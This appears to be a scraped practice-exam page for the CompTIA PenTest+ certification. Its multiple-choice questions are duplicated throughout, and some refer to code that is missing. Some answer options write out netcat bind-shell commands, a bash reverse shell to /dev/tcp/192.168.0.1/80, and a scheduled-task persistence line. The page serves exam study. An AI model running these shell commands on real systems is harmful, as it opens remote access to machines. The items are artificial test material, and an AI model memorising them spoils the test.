Question 1

Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)

Accepted Answer

A)  The tester discovers personally identifiable data on the system. 
B)  The system shows evidence of prior unauthorized compromise. 
C)  The system shows a lack of hardening throughout. 
D)  The system becomes unavailable following an attempted exploit. 
E)  The tester discovers a finding on an out-of-scope system. 
A)  The tester discovers personally identifiable data on the system. 
B)  The system shows evidence of prior unauthorized compromise. 
C)  The system shows a lack of hardening throughout. 
D)  The system becomes unavailable following an attempted exploit. 
E)  The tester discovers a finding on an out-of-scope system.

Question 2

A penetration tester notices that the X-Frame-Options header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

Accepted Answer

A)  Use path modification to escape the application's framework. 
B)  Create a frame that overlays the application. 
C)  Inject a malicious iframe containing JavaScript. 
D)  Pass an iframe attribute that is malicious. 
A)  Use path modification to escape the application's framework. 
B)  Create a frame that overlays the application. 
C)  Inject a malicious iframe containing JavaScript. 
D)  Pass an iframe attribute that is malicious.

Question 3

A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report. Which of the following is the MOST likely reason for the reduced severity?

Accepted Answer

A)  The client has applied a hot fix without updating the version. 
B)  The threat landscape has significantly changed. 
C)  The client has updated their codebase with new features. 
D)  Thera are currently no known exploits for this vulnerability. 
A)  The client has applied a hot fix without updating the version. 
B)  The threat landscape has significantly changed. 
C)  The client has updated their codebase with new features. 
D)  Thera are currently no known exploits for this vulnerability.

Question 4

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

Accepted Answer

A)  Shodan 
B)  SET 
C)  BeEF 
D)  Wireshark 
E)  Maltego
F) Dynamo 
A)  Shodan 
B)  SET 
C)  BeEF 
D)  Wireshark 
E)  Maltego
F) Dynamo

Question 5

During the exploitation phase of a penetration test, a vulnerability is discovered that allows command execution on a Linux web server. A cursory review confirms the system access is only in a low-privilege user context: www-data . After reviewing, the following output from /etc/sudoers:   Which of the following users should be targeted for privilege escalation?

Accepted Answer

A)  Only members of the Linux admin group, OPERATORS, ADMINS, jedwards, and operator can execute privileged commands useful for privilege escalation. 
B)  All users on the machine can execute privileged commands useful for privilege escalation. 
C)  Bfranks, emann, members of the Linux admin group, OPERATORS, and ADMINS can execute commands useful for privilege escalation. 
D)  Jedwards, operator, bfranks, emann, OPERATOR, and ADMINS can execute commands useful for privilege escalation. 
A)  Only members of the Linux admin group, OPERATORS, ADMINS, jedwards, and operator can execute privileged commands useful for privilege escalation. 
B)  All users on the machine can execute privileged commands useful for privilege escalation. 
C)  Bfranks, emann, members of the Linux admin group, OPERATORS, and ADMINS can execute commands useful for privilege escalation. 
D)  Jedwards, operator, bfranks, emann, OPERATOR, and ADMINS can execute commands useful for privilege escalation.

Question 6

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).

Accepted Answer

A)  Mandate all employees take security awareness training. 
B)  Implement two-factor authentication for remote access. 
C)  Install an intrusion prevention system. 
D)  Increase password complexity requirements. 
E)  Install a security information event monitoring solution.
F) Prevent members of the IT department from interactively logging in as administrators.
G) Upgrade the cipher suite used for the VPN solution. 
A)  Mandate all employees take security awareness training. 
B)  Implement two-factor authentication for remote access. 
C)  Install an intrusion prevention system. 
D)  Increase password complexity requirements. 
E)  Install a security information event monitoring solution.
F) Prevent members of the IT department from interactively logging in as administrators.
G) Upgrade the cipher suite used for the VPN solution.

Question 7

After performing a security assessment for a firm, the client was found to have been billed for the time the client's test environment was unavailable. The client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation?

Accepted Answer

A)  SOW 
B)  NDA 
C)  EULA 
D)  BPA 
A)  SOW 
B)  NDA 
C)  EULA 
D)  BPA

Question 8

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:   Which of the following is the tester intending to do?

Accepted Answer

A)  Horizontally escalate privileges. 
B)  Scrape the page for hidden fields. 
C)  Analyze HTTP response code. 
D)  Search for HTTP headers. 
A)  Horizontally escalate privileges. 
B)  Scrape the page for hidden fields. 
C)  Analyze HTTP response code. 
D)  Search for HTTP headers.

Question 9

Which of the following tools is used to perform a credential brute force attack?

Accepted Answer

A)  Hydra 
B)  John the Ripper 
C)  Hashcat 
D)  Peach 
A)  Hydra 
B)  John the Ripper 
C)  Hashcat 
D)  Peach

Question 10

A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?

Accepted Answer

A)  fpipe.exe -1 8080 -r 80 100.170.60.5 
B)  ike-scan -A -t 1 --sourceip=spoof_ip 100.170.60.5 
C)  nmap -sS -A -f 100.170.60.5 
D)  nc 100.170.60.5 8080 /bin/sh 
A)  fpipe.exe -1 8080 -r 80 100.170.60.5 
B)  ike-scan -A -t 1 --sourceip=spoof_ip 100.170.60.5 
C)  nmap -sS -A -f 100.170.60.5 
D)  nc 100.170.60.5 8080 /bin/sh

Question 11

A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

Accepted Answer

A)  nc -lvp 4444 /bin/bash 
B)  nc -vp 4444 /bin/bash 
C)  nc -p 4444 /bin/bash 
D)  nc -lp 4444 -e /bin/bash 
A)  nc -lvp 4444 /bin/bash 
B)  nc -vp 4444 /bin/bash 
C)  nc -p 4444 /bin/bash 
D)  nc -lp 4444 -e /bin/bash

Question 12

A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?

Accepted Answer

A)  schtasks.exe /create/tr "powershell.exe" Sv.ps1 /run 
B)  net session server | dsquery -user | net use c$ 
C)  powershell && set-executionpolicy unrestricted 
D)  reg save HKLM\System\CurrentControlSet\Services\Sv.reg 
A)  schtasks.exe /create/tr "powershell.exe" Sv.ps1 /run 
B)  net session server | dsquery -user | net use c$ 
C)  powershell && set-executionpolicy unrestricted 
D)  reg save HKLM\System\CurrentControlSet\Services\Sv.reg

Question 13

A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?

Accepted Answer

A)  Infrastructure is being replaced with similar hardware and software. 
B)  Systems administrators are applying the wrong patches. 
C)  The organization is not taking action to remediate identified findings. 
D)  The penetration testing tools were misconfigured. 
A)  Infrastructure is being replaced with similar hardware and software. 
B)  Systems administrators are applying the wrong patches. 
C)  The organization is not taking action to remediate identified findings. 
D)  The penetration testing tools were misconfigured.

Question 14

A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

Accepted Answer

A)  2.9 
B)  3.0 
C)  4.0 
D)  5.9 
A)  2.9 
B)  3.0 
C)  4.0 
D)  5.9

Question 15

A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not in a position to risk the availability on the application. Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)

Accepted Answer

A)  Identity and eliminate inline SQL statements from the code. 
B)  Identify and eliminate dynamic SQL from stored procedures. 
C)  Identify and sanitize all user inputs. 
D)  Use a whitelist approach for SQL statements. 
E)  Use a blacklist approach for SQL statements.
F) Identify the source of malicious input and block the IP address. 
A)  Identity and eliminate inline SQL statements from the code. 
B)  Identify and eliminate dynamic SQL from stored procedures. 
C)  Identify and sanitize all user inputs. 
D)  Use a whitelist approach for SQL statements. 
E)  Use a blacklist approach for SQL statements.
F) Identify the source of malicious input and block the IP address.

Question 16

A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in question within the last 30 minutes. Which of the following has MOST likely occurred?

Accepted Answer

A)  The badge was cloned. 
B)  The physical access control server is malfunctioning. 
C)  The system reached the crossover error rate. 
D)  The employee lost the badge. 
A)  The badge was cloned. 
B)  The physical access control server is malfunctioning. 
C)  The system reached the crossover error rate. 
D)  The employee lost the badge.

Question 17

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?

Accepted Answer

A)  Discovery scan 
B)  Stealth scan 
C)  Full scan 
D)  Credentialed scan 
A)  Discovery scan 
B)  Stealth scan 
C)  Full scan 
D)  Credentialed scan

Question 18

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

Accepted Answer

A)  From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal 
B)  From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm 
C)  From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 "xhost+; xterm" 
D)  nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000 
A)  From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal 
B)  From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm 
C)  From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 "xhost+; xterm" 
D)  nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000

Question 19

The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 Which of the following describes what the command does?

Accepted Answer

A)  Performs a port scan. 
B)  Grabs the web server's banner. 
C)  Redirects a TTY to a remote system. 
D)  Removes error logs for the supplied IP. 
A)  Performs a port scan. 
B)  Grabs the web server's banner. 
C)  Redirects a TTY to a remote system. 
D)  Removes error logs for the supplied IP.

Question 20

Given the following script:   Which of the following BEST describes the purpose of this script?

Accepted Answer

A)  Log collection 
B)  Event collection 
C)  Keystroke monitoring 
D)  Debug message collection 
A)  Log collection 
B)  Event collection 
C)  Keystroke monitoring 
D)  Debug message collection

Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)

A penetration tester notices that the X-Frame-Options header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

After performing a security assessment for a firm, the client was found to have been billed for the time the client's test environment was unavailable. The client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation?

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output: Which of the following is the tester intending to do?

Which of the following tools is used to perform a credential brute force attack?

A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?

A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?

A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?

A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 Which of the following describes what the command does?

Given the following script: Which of the following BEST describes the purpose of this script?

CompTIA A+ Certification Exam: Core 1

CompTIA A+ Certification Exam: Core 2

CompTIA Advanced Security Practitioner (CASP+) CAS-003

CompTIA Advanced Security Practitioner (CASP+) CAS-004

CompTIA Cloud Essentials+

CompTIA CySA+ Certification Exam (CS0-002)

CompTIA Cloud+ (CV0-002)

CompTIA Cloud+

CompTIA IT Fundamentals

CompTIA Network+

CompTIA Project+

CompTIA Server+

CompTIA Server+ Certification Exam

CompTIA Security+

CompTIA Security+ 2021

CompTIA CTT+ Essentials

CompTIA Linux+

Filters

Exam 12: CompTIA PenTest+ Certification Exam

Which of the following situations would cause a penetration tester to communicate with a system owner/client during the course of a test? (Select TWO.)

A penetration tester notices that the X-Frame-Options header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

After performing a security assessment for a firm, the client was found to have been billed for the time the client's test environment was unavailable. The client claims to have been billed unfairly. Which of the following documents would MOST likely be able to provide guidance in such a situation?

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output: Which of the following is the tester intending to do?

Which of the following tools is used to perform a credential brute force attack?

A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?

A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?

A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?

A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

The following line was found in an exploited machine's history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 Which of the following describes what the command does?

Given the following script: Which of the following BEST describes the purpose of this script?

CompTIA A+ Certification Exam: Core 1

CompTIA A+ Certification Exam: Core 2

CompTIA Advanced Security Practitioner (CASP+) CAS-003

CompTIA Advanced Security Practitioner (CASP+) CAS-004

CompTIA Cloud Essentials+

CompTIA CySA+ Certification Exam (CS0-002)

CompTIA Cloud+ (CV0-002)

CompTIA Cloud+

CompTIA IT Fundamentals

CompTIA Network+

CompTIA Project+

CompTIA Server+

CompTIA Server+ Certification Exam

CompTIA Security+

CompTIA Security+ 2021

CompTIA CTT+ Essentials

CompTIA Linux+

Filters